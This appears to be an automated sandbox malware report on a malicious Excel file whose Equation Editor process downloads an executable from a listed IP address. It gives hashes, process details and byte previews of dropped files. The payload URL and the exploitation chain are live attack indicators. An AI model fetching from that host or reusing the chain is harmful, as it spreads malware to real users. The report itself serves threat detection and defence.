    http://ocsp.thawte.com0vbc.exe.2.dr, .win32[1].exe.2.drfalse
    • URL Reputation: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    198.46.132.195
    unknownUnited States
    36352AS-COLOCROSSINGUStrue
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:573118
    Start date:16.02.2022
    Start time:09:10:03
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 39s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:_FM_BUSAN_HOCHIMINH_.xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal96.expl.winXLSX@4/20@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 100% (good quality ratio 94.2%)
    • Quality average: 83.3%
    • Quality standard deviation: 26.7%
    HCA Information:Failed
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsx
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    • TCP Packets have been reduced to 100
    TimeTypeDescription
    09:10:47API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
    09:10:50API Interceptor832x Sleep call for process: vbc.exe modified
    No context
    No context
    No context
    No context
    No context
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:downloaded
    Size (bytes):1096080
    Entropy (8bit):7.1881406519771005
    Encrypted:false
    SSDEEP:24576:HnYO/xJrstd2u3Slcfo259gy6Ym4ZrpdSdwwDtrm83zh:dbst4u3vA2PgTqpdSdvDtrm+zh
    MD5:9052D06C6AC53471F8496263F8FEF2EB
    SHA1:73016558C8353509B15CD757063816369E9ABFA7
    SHA-256:736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
    SHA-512:84837F8C708A8E51FCC611C3035C5676FF527D5B132398D935C77AC737035BEF9C27DD6010188D6C96B7D1B02FF8DC41A3F50C487F42348BD0F3D016164FA7FC
    Malicious:true
    Antivirus:
    • Antivirus: Virustotal, Detection: 1%, Browse
    • Antivirus: Metadefender, Detection: 9%, Browse
    • Antivirus: ReversingLabs, Detection: 0%
    Reputation:moderate, very likely benign file
    IE Cache URL:http://198.46.132.195/ProgramFile/.win32.exe
    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....>.]..........................................@.......................................@.................................P5..........0............|...=.......q......................................\...........,;..(............................text...^........................... ..`.rdata...l.......n..................@..@.data...0N...`.......J..............@....00cfg...............T..............@..@.gfids...............V..............@..@.rsrc...0............X..............@..@.reloc...q.......r..................@..B................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):3747
    Entropy (8bit):7.932023348968795
    Encrypted:false
    SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
    MD5:5EB99F38CB355D8DAD5E791E2A0C9922
    SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
    SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
    SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1099960
    Entropy (8bit):2.015387492153731
    Encrypted:false
    SSDEEP:3072:w0Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:xahIFdyiaT2qtXl
    MD5:BE871EA2D026762E96E3DDBDB386F589
    SHA1:66FA5F1942CA698B189EA90C885C5A468B99A312
    SHA-256:EA25DD3B6161C5D8C8D4FE64B3D2105F158391DF08991A28ACD0D8B0A0D176C6
    SHA-512:8F54B12A5D00773223F3EE01132C1DF7F76FCFF3A4C53CAB121B9D619F1677F7A399E4687B0ED08E95F798F7746A8EE57B5F59D68A3483DBADCF7983E7CE1CF2
    Malicious:false
    Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................y$...../..f.y.@..%...../.(./......./.../.RQUQ../.../......./.p./.$QUQ../.../. ...Id.y../.../. .......,.6..d.y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...../.../..8.y....,.6.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):3747
    Entropy (8bit):7.932023348968795
    Encrypted:false
    SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
    MD5:5EB99F38CB355D8DAD5E791E2A0C9922
    SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
    SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
    SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
    Malicious:false
    Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:CDFV2 Encrypted
    Category:dropped
    Size (bytes):191784
    Entropy (8bit):7.958202975592025
    Encrypted:false
    SSDEEP:3072:dnK3hkFr084G2tQX/WdCcsE7i9y6T9BSRIjDALPOWEW7eDy/wLyjjBvRhNasgKVT:c3K108GtC/uCcsjk6TWODA7heDvwa5y
